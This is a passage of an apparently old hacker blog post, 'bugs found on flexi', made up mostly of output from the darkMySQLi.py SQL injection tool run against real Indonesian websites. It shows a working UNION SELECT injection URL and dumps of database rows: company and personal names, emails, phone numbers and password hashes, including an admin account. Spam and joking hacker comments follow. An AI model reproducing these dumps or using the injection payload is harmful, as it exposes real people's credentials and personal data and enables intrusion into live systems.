[16] PROSOUND:*48CAB8176F9EAC9909A6077AF1CDFA14F34A8813:Dian Pramudita Kusuma:viskat@yahoo.com:021:cp:99:2007-06-27:
[17] SONYBMG:*09FEFF1A4D20AD8BC76BD4E16ECE8BE6A6171B96:Sony BMG Music Entertainment Indonesia:peter.hendarmin@sonybmg.com , hasjim.komala@sonybmg.com:021:cp:93:2007-06-27:
[18] IGUANA:*5140F1A385DDD9ADD5C76F86F05336581B7DC202:Iguana Technology:irene@iguanatechnology.com:021:cp:25:2007-06-27:
[19] BOLEH:*C1A195113009278ACF44955D440C192FBC32232E:Boleh Net Indonesia:vera@boleh.net.id:021:cp:11:2007-06-27:
[20] MORA CONTENT:*DE9ED8860DE81D4B2330343A1C59AB213A09BE41:Mora Advertising Content:accounting@macontent.co.id:021:cp:85:2007-06-27:
[21] JATIS:*A6235F07491BE14B163BCF6D1846A82DADCB3FB7:Informasi Teknologi Indonesia:yuliana.theodora@jatis.com:021:cp:8:2007-06-27:
[22] APR:*EE32A8AD9127C0B2562C2F7A2E0202F2FFDB4C48:Asia Perkasa Raya:zainal@asiaperkasa.co.id:021:cp:9:2007-06-27:
[23] VIRGO:*E125241D001291BD4823549FBA1EAAAB766B2526:Virgo Ramayana Record:chris@mobimax.biz:021:cp:100:2007-06-27:
[24] E-MOTION:*A20A9B9CF7D31196311A9E37AB9BC0AE130A3A7E:E-Motion Entertaintment:yvonne@e-motion.co.id:021:cp:32:2007-06-27:
[25] UMI:*4B0BD3CADDB339B9CFD91823D4007B2A4015C48A:Universal Music Indonesia:Ario.Tamat@umusic.com:021:cp:96:2007-06-27:
[26] INDOSEMAR:*9A985F4877D64EF96241CF05024E15DD0635CBB9:Indo Semar Sakti:wendy@indosemarsakti.co.id , iss@centrin.co.id , kurnia@indosemarsakti.co.id:021:cp:102:2007-06-27:
[27] SCM:*E9F4FEAE789D9183C6165D05973320CEE212D228:Surya Citra Media:sinta@sctv.co.id:021:cp:44:2007-06-27:
[28] OVIS:*A611E316502607340F7FBE87D46E792045F86282:Ovis Send’n Save:accounting@sendnsave.com:0213520520:cp:66:2007-06-27:
[29] MONSTERMOB:*1FC1187AFC22058D41FF4DEB3D67ACAC7A307675:Monstermob Indonesia:maya@kapanlagi.net:021:cp:23:2007-06-27:
[30] MOBAFONE:*11B7C9AFFCA10E75E0CA4A1F4475FA0FB5B37A0D:Mobafone Indonesia:er@mobafone.co.id:021:cp:61:2007-06-27:
[31] DETIK:*52EBD5AA00989D84DD16F0A34D9DA41C4EA2E6F0:Agranet Multicitra Siberkom:yanti@staff.detik.com:021:cp:15:2007-06-27:
[32] SANI:*CFBE4D0A7283F7684F082A8528A4DAA53AAC92A1:Sani Sentosa Abadi:handry@sanimusic.com:021:cp:98:2007-06-27:
[33] MOBILETREN:*8B13BC9CA535A15F7598A828D0A4E2B01B23F974:Surya Genta Perkasa:novan@mobiletren.com:021:cp:2:2007-06-27:
[34] BRAINCODE:*32D8296788BC174EC1E5172F3F1A78E4EF9DA8D3:Braincode Solution:silvia@braincodesolution.com:021:cp:73:2007-06-27:
[35] MKU:*0E1D2AB1BC0BF542A807B893B52491F80B5094D3:Media Kreasindo Utama:tessa@zingmobile.com:0215762300:cp:122:2007-06-27:
[36] ARGA SWARA:*40267A0C701DC139C6F6A09B61C52CBEBA3AE589:Arga Swara Kencana Musik:nyoman.dharmawan@emimusic.com:021:cp:97:2007-06-27:
[37] INDOCOM:*4340E0DFFB24372D9BFF6E440C445C537E9820E5:Indocom Mediatama:azwar@indocomgroup.com:021:cp:138:2007-06-27:
[38] COMETA:*600438BE94E9FEC664D7EC17A126B2AD3CE90F49:Cometa Mobile:satria@cometa-mobile.com:021:cp:47:2007-06-27:
[39] RPJ:*BC9276024B76F592ADC591195759C0F49F837719:Raya Persada Jaya:Jputra@axxesmobile.com:021:cp:120:2007-06-27:
[40] PLUS:*9308BF77F53B0B10857C87A2511EC06D8CBE2945:Prima Lintas Utama Sentosa:jemmy@musica-studios.co.id:021:cp:10:2007-06-27:
[41] RTI INFOKOM:*E5F0CE2172BCEAF1E67F370A8F329D3D82A998DD:RTI Infokom:rosa@rti.co.id:021:cp:27:2007-06-27:
[42] MTOUCHE:*16978E58F3ECE52A188C71AB76BA79FFF375DB43:mTOUCHE:swiephie@mtouche.com:021:cp:90:2007-06-27:
[43] NAGASWARA:*9A3DFF2C7B9E00B3A70E3422AFCC80692FD7DBAE:Naga SWARASAKTI:indri@nagaswara.co.id:021:cp:146:2007-06-27:
[44] AGRABUDI:*67875252AE86C8A4B3EC0518D5C7A9180E89E342:Agrabudi Multi Media:jawotop@agrabudi.com:021:cp:60:2007-06-27:
[45] HYPERMIND:*708FA40F43699FC9227FF139D27626AF3B9E8766:Hypermind:ilma@hypermind.biz:021:cp:41:2007-06-27:
[46] INTOUCH:*FE531E3A1EC031ABC949766A11461D0537191F1E:Integra Solusindo Telematika:ellen@intouch.co.id:021:cp:28:2007-06-27:
[47] CAKRAWALA:*AB466DD22F0D9D83D45D75F16A760693A9375E49:Cakrawala Andalas Televisi:abcd@agm.co.id:021:cp:64:2007-06-27:
[48] KCM:*FB6BD7C2EB4F6DA2929CD0A1C0696126464C8EDA:Kompas Cyber Media:murbas@kompas.co.id:021:cp:22:2007-06-27:
[49] IMT:*68D359DE85DC1E7D52731CE860AF8D3B00787A77:Indonesia Media Technologies:suelyn@imt.co.id:021:cp:7:2007-06-27:
[50] ILN:*5E02FD000B40B1782789994841F87592B42784C7:Informatika Lintasnusa:sondang@informatika.co.id:022:cp:38:2007-06-27:
[51] PULSA:*F92BC7EB6418B3726F44608995211317EA6C9064:Pulsa Indomedia Pratama:akbar@koinsms.com:021.30006868 ext.428:cp:72:2007-06-27:
[52] AMP:*2E92920284832CE6397B3264C4F0D1B75AE879D7:Antar Mitra Perkasa:yeni@mobile-elab.com:021-5258188:cp:16:2007-06-27:
[53] STARMEDIA:*91E11CD9CA751A2C7DCFEBA6AEA0C44CAA4DB48F:Starmedia Mobile:fidelia@star-media.co.id:021:cp:69:2007-06-27:
[54] VISIMEDIA:*C99E9D24C70FBED7D81A6339E993AFF238717FCB:Visimedia Citra Komunika:ikurniawan@visimedia.net:(022) 7001-8086:cp:51:2007-06-27:
[55] DIPENDA JATI:*094D22309CEF6AFA40917CEAA9FFB0774B6EA1A0:Dinas Pendapatan Propinsi Jawa Timur:fajar@dipenda.go.id:031:cp:88:2007-06-27:
[56] BUBU:*AB117837783AE127C621C8BEC955227B39AA3CCE:Bubu Kreasi Perdana:abcd@bubuchika.com:021:cp:121:2007-06-27:
[57] PLN:*B13E70801C6DE5EB24B44BD91DBE65E57B8C2808:PLN:abcd@pln.co.id:021:cp:43:2007-06-27:
[58] GAMATECHNO:*D2EDBD6F8DC2ED3BB97BD1213A44327A0B58A95E:Gamatechno Indonesia:erma@gamatechno.com:0274:cp:35:2007-06-27:
[59] ARITA:*6A58217395767C36DD87C0CD2720DFFBF8A2759F:Arita Mobile Internasional:ayu@fun-dering.com:021:cp:62:2007-06-27:
[60] PERMATA CIPT:*AE9B09CE6410AF3771E663A9397EDF6E0C756989:PERMATA CIPTA:abcd@permatacipta.com:021:cp:111:2007-06-27:
[61] UNIKOM:*0E004F5EB77EF985C0AD26D45375F41850CB8A10:UNIKOM INDONESIA:khy0315@hotmail.com , ade24roman@yahoo.com,victor@danal.co.kr:021-53690511:cp:119:2007-06-27:
[62] CIPTA SUARA:*96A76985EF224EEE9503B5E71AF2C64EAA86FA5B:CIPTA SUARA SEMPURNA:kurnia@indosemarsakti.co.id , wendy@indosemarsakti.co.id:024:cp:101:2007-06-27:
[63] BETAWI:*41ADE8E04FBFA1301FF95DD8B38C7FF1E9080B24:Betawi Media Lestari:guntur@mobile.betawi.net:021:cp:5:2007-06-27:
[64] MOCOPLUS:*2857C24243491CBBA0DB6EF2733B5A4DADC7A111:Mocoplus Technology:ajeng@mocoplus.com:021:cp:67:2007-06-27:
[65] BARISTA:*24CEDD71E111C116154A28E8CE0321F5B794C635:Barista Mobile United:silvia@braincodesolution.com:021:cp:82:2007-06-27:
[66] INZPIRE:*545F6D641B4C47C0BE541A85002FE7259A54EB82:INZPIRE:uly@inzpire.net:021:cp:78:2007-06-27:
[67] GEMMA:*95E902F7D5E707ADCC952BBE5052F8EF12D4AD40:Suara Tata Insani:abcd@gemma.com:021:cp:103:2007-06-27:
[68] SINERGI:*1BC714A0F14C0DE6FEF7FAA1C1B9404A4B0F0209:Sinergi Mitra Surya:beverly_zc@yahoo.com:021:cp:70:2007-06-27:
[69] WMM:*1F85C0B943FC576936F3A907F5C7D02FA2EAA902:Waroeng Multi Media:hugy1108@yahoo.com:021:cp:52:2007-06-27:
[70] LOGISS:*9765EBD58A9070336E4FE4EBD161A02944654651:Logiss Record:lilik@logissgroup.com , iwanhendrak@yahoo.com:021:cp:104:2007-06-27:
[71] HALTEK:*31B1A0FA84F96801EAE9FC3E712238F3AB23392E:Haltek Integra Media:abcd@haltek.co.id:022:cp:24:2007-06-27:
[72] NEXIA:*43542F2FD1FA34E9EF3406C6D9AA6D18C56FB14B:Nexia:ria@nexia.com:021:cp:126:2007-06-27:
[73] BITNET:*A7DBEE84EECCA3D30CD3BD48EEA2BD5B8B02AE38:Bitnet Komunikasindo:abcd@bit.net:021:cp:68:2007-06-27:
[74] COCONUT:*BFC3E5D5CADC917F47053AC09429855217BA0BC9:Prima Interaktif:marketing@primainteraktif.com:021:cp:30:2007-06-27:
[75] ARSHEY:*06C3B308554835C96EBE19636E58EEF69801DA36:ARSHEY:abcd@arshey.com:021:cp:50:2007-06-27:
[76] DAVINDO:*2EA5BDE5C2945B1B41124F53928064A4D8432ABD:Davindo Pratama:abcd@davindopratama.com:021:cp:75:2007-06-27:
[77] MOBILYNX:*401034C9BEF0637F622FEA258B220D963C918423:BINA MEDIA MOBILITAS:mcr@mobilynx.info:021 75912722:cp:92:2007-06-27:
[78] METADOME:*34AAFCF73BFB26337720A19245923E057531CB08:Metadom Mobitech:abcd@metadome@com:021:cp:58:2007-06-27:
[79] BIZCOM:*481CBC0C40ED3D2FBA9CCFC9D679CFB52B36340B:Bizcom Network:abcd@bizcom.com:021:cp:4:2007-06-27:
[80] EXULTANTE:*AF0DBE907B7C70B2166F1642B97CA4A913046397:EXULTANTE MOBILE:eka@indo.com:021:cp:150:2007-06-27:
[81] INFOMEDIA:*9FDAC23B6D8648DA6A2A14A44AE35CE5ECC67E44:Infomedia Nusantara:abcd@infomedia.com:021:cp:33:2007-06-27:
[82] BMT:*1787E5A29D2611FDFCC38C0F35367433C3CFDACA:Buana Media Teknologi:abcd@bmt.com:021:cp:54:2007-06-27:
[83] COWON:*6E4B53FDF29560B9B1F4D1750FFFF6EB0202DD0D:Cowon Indonesia:abcd@cowon.co.id:021-5262409:cp:148:2007-06-27:
[84] VISITEL:*A4B6157319038724E3560894F7F932C8886EBFCF:Indika Telemedia Mobile:iie.tjay@visitel.co.id:021 – 24507777:cp:3:2007-07-02:
[85] WARNER:*E21912C3E60F3AF2B81CEB7151C97D0FAC6FA1E8:PT. WARNER INDONESIA:abcd@warner.co.id:021-:cp:162:2007-08-10:
[86] AQUARIUS:*0A0E909CE3FFB9AFD04CC0F82C312392EE89469B:AQUARIUS:ayu@aquariusmusikindo.com:0213807236:cp:161:2007-08-10:
[87] FLOWER:*60D905C5C22F4E37DCE2CCF6DA8EADC5F7424C7E:FLOWER:abcd@flower.co.id:021:cp:163:2007-08-10:
[88] 740123:*EF4807F023B0595315D53E2B99C3753999C2C0B9:Indarto:indarto@telkom.co.id:021-70224460:user:0:2007-08-20:
[89] NEXTNATION:*C60A1F4359EAD45C76E992F97944E741304ADBEC:NEXTNATION PRISMA:abcd@nextnation.com:021:cp:153:2007-10-25:
[90] CHERRYPICKS:*65A6C2C8DEB5F92937A340F7D92A8B87E4217AEA:CHERRYPICKS INDONESIA:adcb@cherrypicks.com:021:cp:154:2007-10-25:
[91] LDS:*FBE3FAA10DCABDC5E1FF24AD4E68EE70F30D8D3A:LAKSANA DEWA SATRIA:abcd@lds.com:021:cp:145:2007-10-25:
[92] SMS:*145D2C129980A3C7105EA0C22DAC9318F3289371:SINERGI MITRA SURYA:abcd@sms.com:021:cp:70:2007-10-25:

[-] [16:37:15]
[-] Total URL Requests: 94
[-] Done

|————————————————–|
| rsauron@gmail.com                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     — Multi Purpose MySQL Injection Tool –     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|————————————————–|

[+] URL: http://www.telkomflexi.com/detail_produk.php?id=130+AND+1=2+UNION+SELECT+1,2,darkc0de,4,5,6,7,darkc0de,9,10,11,12,13,14,15,16,17,18,19,20,21,22
[+] 16:40:27
[+] Evasion: + –
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: dbflexi
User: dbaflexi@app1
Version: 5.0.45
[+] Dumping data from database “dbarya” Table “bs_users”
[+] Column(s) ['ID', 'user_login', 'user_pass', 'user_nicename', 'user_email', 'user_url', 'user_registered', 'user_activation_key', 'user_status', 'display_name']
[+] Number of Rows: 1

[1] 1:admin:54ae528795c3819d3dc526907b445793:admin:satriananta@yahoo.com:http://:2007-11-22 13:25:33:NoDataInColumn:0:admin:

[-] [16:40:37]
[-] Total URL Requests: 3
[-] Done

VN:F [1.6.9_936]
Rating: 0.0/10 (0 votes cast)
VN:F [1.6.9_936]
Rating: 0 (from 0 votes)

4 Responses to “bugs found on flexi …”

  1. Trackback : Cheap auto insurance quotes » Tips on getting cheap auto insurance quotes ... Says:
    November 28th, 2009 at 9:29 am

    (…) is another nice source of information on this issue(…)

    UN:F [1.6.9_936]
    Rating: 0.0/5 (0 votes cast)
    UN:F [1.6.9_936]
    Rating: 0 (from 0 votes)
  2. Trackback : loans Rate » How can I refinance my credit score ... Says:
    November 29th, 2009 at 1:06 pm

    (…) is one great source of information on this topic(…)

    UN:F [1.6.9_936]
    Rating: 0.0/5 (0 votes cast)
    UN:F [1.6.9_936]
    Rating: 0 (from 0 votes)
  3. Whey Protein side Effects Says:
    December 8th, 2009 at 12:37 am

    Very great site.
    The information here is really helpful.

    I will tell my friends.

    Cheers

    UN:F [1.6.9_936]
    Rating: 0.0/5 (0 votes cast)
    UN:F [1.6.9_936]
    Rating: 0 (from 0 votes)
  4. L4zyb0i Says:
    January 24th, 2010 at 11:19 pm

    wkwkw…gak di dipes skalian tuuh….

    UN:F [1.6.9_936]
    Rating: 0.0/5 (0 votes cast)
    UN:F [1.6.9_936]
    Rating: 0 (from 0 votes)

Leave a Reply

:1up: :alert: :ban: :beer: :borg: :coffee: :cuckoo: :cuss: :finger: :goombah: :stupid: :megaman: :mad: :pity: :noshake: :oogle: :pacman: :pill: :poison: :poop: :rant: :satansmoking: :shake: :shiftyeyes: :shroom: :sick: :smirk: :spammer: :stfu: :thumbdown: :thumbup: :turtle: :what: :whatever: